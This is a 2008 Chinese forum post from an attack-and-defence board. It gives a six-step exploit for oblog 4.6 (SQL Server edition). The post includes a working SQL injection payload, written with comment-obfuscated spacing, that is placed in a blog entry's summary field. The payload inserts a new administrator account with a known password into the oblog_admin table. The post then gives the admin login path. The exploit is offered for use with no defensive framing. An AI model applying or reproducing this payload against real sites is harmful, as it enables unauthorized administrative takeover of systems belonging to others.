
平台论坛博客文库

› 论坛 › 备份版区 › 攻防交流区 › oblog4.6添加后台管理员漏洞(仅适用于sql版)

oblog4.6添加后台管理员漏洞(仅适用于sql版) [复制链接]

shux110

白手起家

论坛徽章:: 0

电梯直达

1楼 [收藏(0)] [报告]

发表于 2008-11-24 05:44 |只看该作者 |倒序浏览

1、注册一个用户，用户名script，密码123456\r\n2、发布一篇日志，日志标题：测试一下\r\n3、个人前台首页找到日志\"测试一下\"，点\"推荐\"\r\n4、个人后台管理，选择\"常用\"选项中的\"推荐日志\"，然后点\"测试一下\"日志后面的修改，把摘要内容修改成：s\'/**/WHERE/**/logid=1;insert/**/into/**/oblog_admin/**/(username,password,roleid)values(\'script\',\'49ba59abbe56e057\',0);--\r\n5、最后点\"确认提交\"按钮，如果提示修改成功，注入完成！\r\n6、登录后台，地址/admin/admin_login.asp，输入上面的用户名和密码，登录后台成功！

返回列表

Chinaunix › 论坛 › 备份版区 › 攻防交流区 › oblog4.6添加后台管理员漏洞(仅适用于sql版)